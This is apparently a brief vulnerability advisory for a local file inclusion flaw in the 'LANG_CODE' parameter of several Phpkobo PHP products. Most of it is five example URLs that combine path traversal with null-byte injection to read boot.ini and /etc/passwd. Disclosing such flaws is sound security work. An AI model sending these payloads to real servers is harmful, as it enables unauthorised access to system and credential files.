Phpkobo Multiple Products 'LANG_CODE' Parameter Local File Include Vulnerability

Phpkobo Multiple Products 'LANG_CODE' Parameter Local File Include Vulnerability

Attackers may exploit this issue through a browser.

The following example URIs are available:

http://www.example.com/web/codelib/cfg/common.inc.php?LANG_CODE=..//..//..//..//boot.ini%00 and /etc/passwd%00
http://www.example.com/web/codelib/sys/common.inc.php?LANG_CODE=..//..//..//..//boot.ini%00 and /etc/passwd%00
http://www.example.com/web/staff/common.inc.php?LANG_CODE=..//..//..//..//boot.ini%00 and /etc/passwd%00
http://www.example.com/web/staff/file.php?LANG_CODE=..//..//..//..//boot.ini%00 and /etc/passwd%00
http://www.example.com/web/staff/app/common.inc.php?LANG_CODE=..//..//..//..//boot.ini%00 and /etc/passwd%00